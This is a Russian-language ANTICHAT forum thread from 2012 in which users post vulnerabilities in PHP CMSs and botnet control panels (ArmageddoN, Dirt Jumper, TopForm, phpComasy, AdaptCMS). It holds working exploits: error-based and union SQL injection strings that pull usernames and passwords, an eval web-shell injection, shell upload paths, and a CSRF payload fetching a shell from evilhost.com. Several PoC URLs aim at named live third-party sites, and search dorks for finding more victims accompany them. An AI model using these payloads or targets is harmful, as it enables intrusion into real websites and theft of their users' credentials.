ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.01.2012, 14:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
ArmageddoN DDoS Bots 2.0
SQL Инъекция & Выполнение кода
NEED:magic_quotes_gpc = Off, admin_rights
Уязвимый участок кода:
index.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fh[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fh[/COLOR][COLOR="#007700"]);
}
[...] if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'url'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'url'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'url'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]addcommand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]); }
[...][/COLOR][/COLOR]
Добавляем новую команду с текстом:
Код:
Code:
'; @eval($_REQUEST['cmd']); $a='lol
Exec: /command.php?cmd=phpinfo();
Чтение содержимого файлов (config.php+)
NEED:admin_rights
editheaders.php
Уязвимый участок кода:
[PHP]
PHP:
[COLOR="#000000"][COLOR="#007700"]&filename=shell.php%00 (при условии magic_quotes_gpc = Off)
?com=Save&data=&filename=shell.php////[4096 слешей]////
[/CODE]
Раскрытие путей
Почти в каждом файле(login.php+)
Уязвимый участок кода:
Код:
Code:
session_start();
Код:
Code:
Cookie: PHPSESSID=!@#$%^&*()_+;
©0x0000ED.COM, Boolean |
|
|
|
17.02.2012, 21:56
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
TopForm CMS офф. сайт
error-based sql
уязвимый параметр issue_id
Код:
Code:
issue_id=7'+and+(select+1+from(select+count(*),concat((select+concat(login,0x3a,password)+from+users+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)+--+
так же уязвимы параметры id и cat
в админке:
/admin.php
sql в post-запросе логина
уязвимый параметр parent
Код:
Code:
admin.php?a=issues&parent=11+and+(select+1+from(select+count(*),concat((select+concat(login,0x3a,password)+from+users+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)+--+&action=new
так же issue_id, class
PoC:
Код:
Code:
http://bzhi.ru/?issue_id=7&cat=2'+and+(select+1+from(select+count(*),concat((select+concat(login,0x3a,password)+from+users+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)+--+
dork:
Код:
Code:
inurl:"index.php?issue_id="
© faza02 |
|
|
04.03.2012, 00:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
5
|
|
memento cms 2
memento cms 2
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]issue_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql inj[/COLOR][/COLOR]
админка: admin.php
пароли не хэшированны
хотя возможно это и есть то что в предидущем посте
|
|
|
|
04.03.2012, 09:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Обзор уязвимостей админ панели Dirt Jumper 5
SQL Inj [INSERT]
/index.php:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]
[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'k'[/COLOR][COLOR="#007700"]];
[...]
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" INSERT INTO `td` (`ip`,`ip2`,`time`)VALUES('[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#0000BB"]$ip2[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"]);
[...]
[/COLOR][/COLOR]
Из инъекции особо ничего не вытянуть, но «обесточить» сервер можно, воспользовавшись тем же BENCHMARK'ом.
Если честно, непонятно, что курили разработчики, но команды хранятся в файле img.gif и для показа ботам файл инклудится.
/index.php:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]
include[/COLOR][COLOR="#DD0000"]"img.gif"[/COLOR][COLOR="#007700"];
[...]
[/COLOR][/COLOR]
Code Execution
Нужны права админа.
1. Добавляем новую команду:
* Никакой фильтрации нет вообще.
2. POST index.php:
Код:
Code:
k=1&cmd=phpinfo()
Если знаете параметр $GET_login, который прописывается в конфиге(по дефолту dj5) можно провернуть CSRF результатом которого будет выполнение php кода и xss.
Где http://EVILHOST.COM/EVIL.JS ссылка на ваш зловредный js код.
* Можно еще сразу же средствами js отправить POST запрос на /index.php, и выполнить код, например
Код:
Code:
copy("http://evilhost.com/shell.txt", "shell.php"); file_put_contents("img.gif", "");
Тогда шелл автоматически зальется(если прав хватит), а img.gif очистится.
|
|
|
|
17.05.2012, 13:29
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Уязвимый скрипт: public.php
Уязвимая функция:
display_fns.php
Сообщение от None
global $id_n;
$conn_nt=db_connect("select id_pub, name, link, text
from pub
where id_pub =
$id_n
");
$pub_text=mysql_fetch_array($conn_nt);
$id_pub="$pub_text[id_pub]";
$name="$pub_text[name]";
$text="$pub_text[text]";
$link="$pub_text[link]";
echo "$name";
echo "$link";
echo "";
echo "$text";
}
http://bionat.ru/public.php?id_n=-24+union+select+concat_ws(0x3a,user_name,password) ,2,3+from+user
http://bogan.ru/service.php?id_s=27999+union+select+concat_ws(0x3a ,user_name,password),2,3+from+user
http://kalmatron-s.ru/public.php?id_n=-24+union+select+1,concat_ws(0x3a,user_name,passwor d),3+from+user
google:
intext:"Copyright © 2002 - 2012, Интернет-агентство «Боган»"
profit:
Для устранения уязвимости достаточно добавить функцию intval();
code:
Сообщение от None
$conn_nt=db_connect("select id_pub, name, link, text
from pub
where id_pub =
intval($id_n)
");
|
|
|
|
04.06.2012, 15:42
|
|
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
Провел на форуме:
5777251
Репутация:
796
|
|
phpComasy 1.0.1
index.php
PHP код:
PHP:
[COLOR="#000000"]
[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$web[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]get_search_form[/COLOR][COLOR="#007700"]() {
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
return[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]form_search[/COLOR][COLOR="#007700"]() {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]_SEARCH[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]introduction[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_SEARCH_STRING[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]search_result[/COLOR][COLOR="#007700"]() {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]_SEARCH[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]introduction[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]// Security check
[/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"](array([/COLOR][COLOR="#DD0000"]"%"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"&"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"?"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\\"[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'searchtext'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$searchtext_umlaut[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tools[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]umlaut[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"]) >=[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$search_query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM `#__page_language` WHERE language='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]language[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_current_language[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]"' AND (LOWER(title) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(introduction) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(content) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(title) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext_umlaut[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(introduction) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext_umlaut[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(content) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext_umlaut[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%');"[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
example:
Код:
Code:
http://www.ssk66.de/?action=search_result
POST: searchtext=sad') or (select count(*)from information_schema.tables group by concat((version()),floor(rand(0)*2)))or('
shell upload:
classes/class.file_manager.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]file_upload[/COLOR][COLOR="#007700"]() {
if ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]security[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]check_security[/COLOR][COLOR="#007700"]() ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]security[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]check_access_for_area[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'filemanager'[/COLOR][COLOR="#007700"])) {
if ([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]]) {
[/COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]strrchr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]chmod[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]0644[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]//chmod fixchmod ($_FILES['file']['tmp_name'],0644); //chmod fix
[/COLOR][COLOR="#0000BB"]$new_filename[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"_"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tools[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]special_chars_to_html[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$new_filename_without_path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"_"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tools[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]special_chars_to_html[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]__ABSOLUTE_PATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/data/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$new_filename[/COLOR][COLOR="#007700"]);
if (([/COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]".png"[/COLOR][COLOR="#007700"]) || ([/COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]".gif"[/COLOR][COLOR="#007700"]) || ([/COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]".jpg"[/COLOR][COLOR="#007700"]) || ([/COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]".jpeg"[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]message[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send_message[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_MESSAGE_FILE_UPLOAD_SUCCESSFUL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'&action=image_convert_form&path='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&file='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$new_filename_without_path[/COLOR][COLOR="#007700"]);
}
else {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]message[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send_message[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_MESSAGE_FILE_UPLOAD_SUCCESSFUL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'&action=file_manager&path='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"]);
}
}
else {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]message[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send_message[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_MESSAGE_REQUIRED_PARAMETER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'&action=file_upload_form&path='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"]);
}
}
else {[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]message[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send_message[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_MESSAGE_NO_PERMISSION[/COLOR][COLOR="#007700"]);}
}
[/COLOR][/COLOR]
classes/class.security.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]check_security[/COLOR][COLOR="#007700"]() {
if ((!empty([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]]) ) && (!empty([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_username'[/COLOR][COLOR="#007700"]])) && (@[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_role'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'admin'[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#FF8000"]// additional check (phpcomasy url)
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_url'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]__WEB_PATH[/COLOR][COLOR="#007700"]) {
return[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
}
else {
return[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
}
}
else {
return[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
}
}
[/COLOR][/COLOR]
Shell: http://site.com/data/shell.php
Dork: powered by phpComasy
|
|
|
|
20.06.2012, 12:13
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
AdaptCMS
Уязвимости AdaptCMS 2.0.x
Сайт разработчика
Скачать
SQL injection
Зависимости: magic_quotes_gpc = off
File: /inc/function.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if ([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$poll_sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pre[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"polls WHERE poll_id = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND type = 'poll'"[/COLOR][COLOR="#007700"]);
}
...[/COLOR][/COLOR]
Exploit:
http://127.0.0.1/cms/index.php?view=polls&id=1' and 1=0 union select 1,2,version(),4,5,6,7,8 --
LFI
Зависимости: magic_quotes_gpc = off
File: /inc/web/plugins.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
